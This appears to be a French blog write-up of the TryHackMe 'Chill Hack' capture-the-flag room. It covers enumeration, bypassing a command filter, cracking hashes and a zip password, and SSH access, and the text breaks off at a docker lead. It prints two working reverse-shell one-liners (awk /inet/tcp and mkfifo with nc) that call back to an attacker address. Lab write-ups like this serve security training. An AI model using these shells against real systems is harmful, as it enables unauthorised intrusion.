{"id":404,"date":"2020-11-27T10:06:03","date_gmt":"2020-11-27T09:06:03","guid":{"rendered":"https:\/\/mikadmin.fr\/blog\/?p=404"},"modified":"2021-09-19T01:05:33","modified_gmt":"2021-09-18T23:05:33","slug":"tryhackme-chill-hack","status":"publish","type":"post","link":"https:\/\/mikadmin.fr\/blog\/tryhackme-chill-hack\/","title":{"rendered":"[TryHackme] &#8211; Chill Hack"},"content":{"rendered":"<span class=\"span-reading-time rt-reading-time\" style=\"display: block;\"><span class=\"rt-label rt-prefix\"><\/span> <span class=\"rt-time\"> 4<\/span> <span class=\"rt-label rt-postfix\">min read<\/span><\/span><p>Views: 1933<\/p>\n<div id=\"block-77f4b692-cc09-43e1-808e-cffef768645c\" class=\"wp-block-image\"><figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/897a124df0a70ad86502193b83f46658.png\" alt=\"chill hack\" class=\"wp-image-406\" width=\"383\" height=\"344\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/897a124df0a70ad86502193b83f46658.png 283w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/897a124df0a70ad86502193b83f46658-150x135.png 150w\" sizes=\"auto, (max-width: 383px) 100vw, 383px\" \/><\/figure><\/div>\n\n\n\n<p class=\"has-text-align-center\" id=\"block-be1c4520-f299-4c4b-9d03-1400ebbcabb9\" style=\"font-size:19px\"><strong>Lien : <\/strong><a href=\"https:\/\/tryhackme.com\/room\/chillhack\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/tryhackme.com\/room\/chillhack<\/a><\/p>\n\n\n\n<p class=\"has-text-align-center\">La room <strong>chill hack<\/strong> est de niveau <span style=\"color:#00d084\" class=\"tadv-color\">facile<\/span>.<\/p>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"block-d4beac4a-482c-467a-ba27-b0b34ad79a88\">[Task 1]<\/h2>\n\n\n\n<div style=\"height:24px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\" id=\"block-ddbdaead-227b-43a9-a775-98e3fdee8669\">Dans un premier, nous allons effectuer un scan <strong>nmap<\/strong> sur la machine <strong><a href=\"https:\/\/mikadmin.fr\/blog\/linux-privilege-escalation-python-library-hijacking\/\" target=\"_blank\" rel=\"noreferrer noopener\">chill hack<\/a><\/strong> :<\/p>\n\n\n\n<div style=\"height:26px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"721\" height=\"579\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_21.png\" alt=\"\" class=\"wp-image-409\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_21.png 721w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_21-300x241.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_21-150x120.png 150w\" sizes=\"auto, (max-width: 721px) 100vw, 721px\" \/><\/figure><\/div>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">On peut donc remarquer que le <strong>service FTP<\/strong> est disponible en <strong>anonyme<\/strong> avec un fichier qui se nomme <strong>note.txt<\/strong>.<\/p>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"659\" height=\"560\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_1-1.png\" alt=\"\" class=\"wp-image-411\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_1-1.png 659w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_1-1-300x255.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_1-1-150x127.png 150w\" sizes=\"auto, (max-width: 659px) 100vw, 659px\" \/><\/figure><\/div>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Nous avons donc l\u00e0 plusieurs indications \u00e0 noter, la premi\u00e8re \u00e9tant qu&rsquo;il existe <strong>un filtre sur plusieurs strings<\/strong> dans une <strong>commande<\/strong> et la deuxi\u00e8me est que nous avons <strong>deux potentiels utilisateurs<\/strong> \u00e0 noter pour la suite : <strong>Anurodh<\/strong> &amp; <strong>Apaar<\/strong>.<\/p>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<div style=\"height:36px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Il est temps de se diriger du c\u00f4t\u00e9 du <strong>site web<\/strong> pr\u00e9sent sur la machine :<\/p>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"893\" height=\"373\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_23-1.png\" alt=\"\" class=\"wp-image-413\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_23-1.png 893w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_23-1-300x125.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_23-1-150x63.png 150w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_23-1-768x321.png 768w\" sizes=\"auto, (max-width: 893px) 100vw, 893px\" \/><\/figure><\/div>\n\n\n\n<div style=\"height:29px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Nous allons donc <strong>\u00e9num\u00e9rer<\/strong> ce dernier \u00e0 l&rsquo;aide de l&rsquo;outil <strong><span style=\"color:#00d084\" class=\"tadv-color\">ffuf<\/span><\/strong> :<\/p>\n\n\n\n<p class=\"has-text-align-center\"><a href=\"https:\/\/github.com\/ffuf\/ffuf\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/github.com\/ffuf\/ffuf<\/a><\/p>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<pre class=\"wp-block-prismatic-blocks\"><code class=\"language-bash\" data-line=\"\">ffuf -u http:\/\/IP\/FUZZ -c -w \/usr\/share\/seclists\/Discovery\/Web-Content\/common.txt<\/code><\/pre>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"762\" height=\"518\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_3-3.png\" alt=\"\" class=\"wp-image-414\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_3-3.png 762w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_3-3-300x204.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_3-3-150x102.png 150w\" sizes=\"auto, (max-width: 762px) 100vw, 762px\" \/><\/figure><\/div>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Bingo ! Un dossier <strong><span style=\"color:#cf2e2e\" class=\"tadv-color\">secret<\/span><\/strong> est pr\u00e9sent sur le site web :<\/p>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"411\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/image-7.png\" alt=\"Chill Hack\" class=\"wp-image-416\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/image-7.png 960w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/image-7-300x128.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/image-7-150x64.png 150w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/image-7-768x329.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure><\/div>\n\n\n\n<div style=\"height:28px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Il semblerait que nous puissions <strong>ex\u00e9cuter des commandes syst\u00e8mes<\/strong> cependant certaines commandes ou plut\u00f4t <strong>strings <\/strong>comme nous l&rsquo;avons vu pr\u00e9c\u00e9demment sont <strong>bloqu\u00e9es<\/strong>.<\/p>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"488\" height=\"292\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/image-8.png\" alt=\"\" class=\"wp-image-417\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/image-8.png 488w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/image-8-300x180.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/image-8-150x90.png 150w\" sizes=\"auto, (max-width: 488px) 100vw, 488px\" \/><\/figure><\/div>\n\n\n\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Suite \u00e0 plusieurs tests, nous obtenons un acc\u00e8s \u00e0 la machine \u00e0 l&rsquo;aide de la commande <strong>awk<\/strong> qui ne semble pas \u00eatre filtr\u00e9e :<\/p>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<pre class=\"wp-block-prismatic-blocks\"><code class=\"language-bash\" data-line=\"\">awk &#039;BEGIN {s = &quot;\/inet\/tcp\/0\/10.0.0.1\/4242&quot;; while(42) { do{ printf &quot;shell&gt;&quot; |&amp; s; s |&amp; getline c; if(c){ while ((c |&amp; getline) &gt; 0) print $0 |&amp; s; close(c); } } while(c != &quot;exit&quot;) close(s); }}&#039; \/dev\/null<\/code><\/pre>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"911\" height=\"136\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/image-9.png\" alt=\"\" class=\"wp-image-418\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/image-9.png 911w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/image-9-300x45.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/image-9-150x22.png 150w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/image-9-768x115.png 768w\" sizes=\"auto, (max-width: 911px) 100vw, 911px\" \/><\/figure><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"508\" height=\"116\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_4-2.png\" alt=\"\" class=\"wp-image-419\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_4-2.png 508w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_4-2-300x69.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_4-2-150x34.png 150w\" sizes=\"auto, (max-width: 508px) 100vw, 508px\" \/><\/figure><\/div>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">N&rsquo;\u00e9tant pas tr\u00e8s fan de ce dernier je d\u00e9cide de r\u00e9cup\u00e9rer un reverse shell sur un autre port :<\/p>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<pre class=\"wp-block-prismatic-blocks\"><code class=\"language-bash\" data-line=\"\">rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|sh -i 2&gt;&amp;1|nc 10.11.20.104 666 &gt;\/tmp\/f<\/code><\/pre>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"631\" height=\"114\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_5-2.png\" alt=\"\" class=\"wp-image-420\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_5-2.png 631w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_5-2-300x54.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_5-2-150x27.png 150w\" sizes=\"auto, (max-width: 631px) 100vw, 631px\" \/><\/figure><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"505\" height=\"103\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_6-2.png\" alt=\"\" class=\"wp-image-421\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_6-2.png 505w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_6-2-300x61.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_6-2-150x31.png 150w\" sizes=\"auto, (max-width: 505px) 100vw, 505px\" \/><\/figure><\/div>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Il semblerait que la machine dispose d&rsquo;un <strong>service web<\/strong> \u00e9coutant uniquement en local sur le port <strong>9001<\/strong> avec un panel administrateur, en inspectant ce dernier nous r\u00e9cup\u00e9rons les<strong> identifiants de connexion<\/strong> \u00e0 la<strong> base de donn\u00e9es<\/strong> :<\/p>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"867\" height=\"303\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_7.png\" alt=\"\" class=\"wp-image-423\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_7.png 867w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_7-300x105.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_7-150x52.png 150w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_7-768x268.png 768w\" sizes=\"auto, (max-width: 867px) 100vw, 867px\" \/><\/figure><\/div>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Gr\u00e2ce \u00e0 ces derniers, nous trouvons une base de donn\u00e9es <strong><span style=\"color:#cf2e2e\" class=\"tadv-color\">webportal<\/span><\/strong> contenant 2 utilisateurs avec 2 mot de passes <strong>hash\u00e9s<\/strong> en <strong><span style=\"color:#ff6900\" class=\"tadv-color\">md5<\/span><\/strong> :<\/p>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"697\" height=\"546\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_8-1.png\" alt=\"\" class=\"wp-image-424\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_8-1.png 697w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_8-1-300x235.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_8-1-150x118.png 150w\" sizes=\"auto, (max-width: 697px) 100vw, 697px\" \/><\/figure><\/div>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Nous retrouvons facilement le clair de ces derniers :<\/p>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"309\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_9-1-1024x309.png\" alt=\"\" class=\"wp-image-425\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_9-1-1024x309.png 1024w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_9-1-300x90.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_9-1-150x45.png 150w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_9-1-768x232.png 768w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_9-1.png 1131w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure><\/div>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Nous avons par la suite une piste int\u00e9ressante \u00e0 l&rsquo;aide du fichier <strong><span style=\"color:#fcb900\" class=\"tadv-color\">hacker.php<\/span><\/strong> :<\/p>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"781\" height=\"540\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_24-1.png\" alt=\"\" class=\"wp-image-427\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_24-1.png 781w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_24-1-300x207.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_24-1-150x104.png 150w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_24-1-768x531.png 768w\" sizes=\"auto, (max-width: 781px) 100vw, 781px\" \/><\/figure><\/div>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Cette<strong> image semble cacher<\/strong> quelque chose et nous allons donc la r\u00e9cup\u00e9rer sur notre machine :<\/p>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"511\" height=\"67\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/image-10.png\" alt=\"\" class=\"wp-image-429\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/image-10.png 511w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/image-10-300x39.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/image-10-150x20.png 150w\" sizes=\"auto, (max-width: 511px) 100vw, 511px\" \/><\/figure><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"867\" height=\"197\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_10-1.png\" alt=\"\" class=\"wp-image-430\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_10-1.png 867w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_10-1-300x68.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_10-1-150x34.png 150w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_10-1-768x175.png 768w\" sizes=\"auto, (max-width: 867px) 100vw, 867px\" \/><\/figure><\/div>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Apr\u00e8s avoir effectu\u00e9 quelques commandes basiques, nous tentons d&rsquo;utiliser <strong><span style=\"color:#9b51e0\" class=\"tadv-color\">steghide<\/span><\/strong> :<\/p>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"549\" height=\"134\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_12-1.png\" alt=\"\" class=\"wp-image-431\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_12-1.png 549w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_12-1-300x73.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_12-1-150x37.png 150w\" sizes=\"auto, (max-width: 549px) 100vw, 549px\" \/><\/figure><\/div>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Cette image contient donc un fichier <strong><span style=\"color:#cf2e2e\" class=\"tadv-color\">backup.zip<\/span><\/strong> mais ce dernier est prot\u00e9g\u00e9 par un mot de passe et nous faisons donc appel \u00e0 <strong><span style=\"color:#0693e3\" class=\"tadv-color\">john<\/span><\/strong> pour le cracker :<\/p>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"656\" height=\"313\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_13-1.png\" alt=\"\" class=\"wp-image-432\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_13-1.png 656w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_13-1-300x143.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_13-1-150x72.png 150w\" sizes=\"auto, (max-width: 656px) 100vw, 656px\" \/><\/figure><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"780\" height=\"265\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_14-1.png\" alt=\"\" class=\"wp-image-433\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_14-1.png 780w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_14-1-300x102.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_14-1-150x51.png 150w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_14-1-768x261.png 768w\" sizes=\"auto, (max-width: 780px) 100vw, 780px\" \/><\/figure><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Le mot de passe de l&rsquo;archive est donc <strong>pass1word<\/strong> !<\/p>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Cette archive contient donc un <strong>fichier php<\/strong> avec une partie tr\u00e8s int\u00e9ressante contenant un mot de passe <strong>encod\u00e9 en base64<\/strong> :<\/p>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"299\" height=\"109\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/image-11.png\" alt=\"\" class=\"wp-image-437\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/image-11.png 299w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/image-11-150x55.png 150w\" sizes=\"auto, (max-width: 299px) 100vw, 299px\" \/><\/figure><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"569\" height=\"65\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_15-1.png\" alt=\"\" class=\"wp-image-435\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_15-1.png 569w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_15-1-300x34.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_15-1-150x17.png 150w\" sizes=\"auto, (max-width: 569px) 100vw, 569px\" \/><\/figure><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"514\" height=\"68\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_16-1.png\" alt=\"\" class=\"wp-image-436\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_16-1.png 514w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_16-1-300x40.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_16-1-150x20.png 150w\" sizes=\"auto, (max-width: 514px) 100vw, 514px\" \/><\/figure><\/div>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Nous r\u00e9cup\u00e9rons donc le mot de passe et tentons de l&rsquo;utiliser pour se connecter en <strong><span style=\"color:#cf2e2e\" class=\"tadv-color\">ssh<\/span><\/strong> avec l&rsquo;utilisateur <strong>Anurodh<\/strong> :<\/p>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"631\" height=\"538\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_17-1.png\" alt=\"\" class=\"wp-image-438\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_17-1.png 631w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_17-1-300x256.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2020\/11\/Screenshot_17-1-150x128.png 150w\" sizes=\"auto, (max-width: 631px) 100vw, 631px\" \/><\/figure><\/div>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Apr\u00e8s plusieurs recherches, nous trouvons une piste int\u00e9ressante qui est <strong><span style=\"color:#0693e3\" class=\"tadv-color\">docker<\/span><\/strong> :<\/p>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div 